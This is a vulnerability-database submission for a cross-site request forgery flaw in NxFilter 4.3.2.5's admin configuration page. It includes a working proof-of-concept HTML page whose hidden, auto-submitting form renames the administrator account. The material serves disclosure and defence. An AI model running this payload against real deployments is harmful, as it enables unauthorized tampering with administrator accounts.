Submit #249432: Nxfilter NxFilter 4.3.2.5 4.3.2.5 CSRFinfo

TitelNxfilter NxFilter 4.3.2.5 4.3.2.5 CSRF
BeschreibungA CSRF is present in https://APP.COM/config,admin.jsp where a malicious user change the username of the administrator through a CSRF. If the Admin clicks on the link, his name can be changed by the name the hacker want. Exploit in HTML: <!DOCTYPE html> <html lang="en"> <head> </head> <body> <form id="configForm" action="https://192.168.0.134/config,admin.jsp" method="POST"> <!-- Campos do formulário --> <input type="hidden" name="actionFlag" value="update"> <input type="text" name="admin_name" value="hacker" style="display: none;"> <!--name here--> <!-- Botão para enviar o formulário --> <button type="submit">Enviar Requisição</button> </form> </body> <script> document.getElementById('configForm').submit(); </script> </html>
Quelle⚠️ https://APP.COM/config,admin.jsp
Benutzer
 0xgordo (UID 50709)
Einreichung08.12.2023 17:26 (vor 3 Jahren)
Moderieren17.12.2023 09:25 (9 days later)
StatusAkzeptiert
VulDB Eintrag248266 [Jahastech NxFilter 4.3.2.5 /config,admin.jsp admin_name Cross Site Request Forgery]
Punkte17

ZurückÜbersichtWeiter

Interested in the pricing of exploits?

See the underground prices here!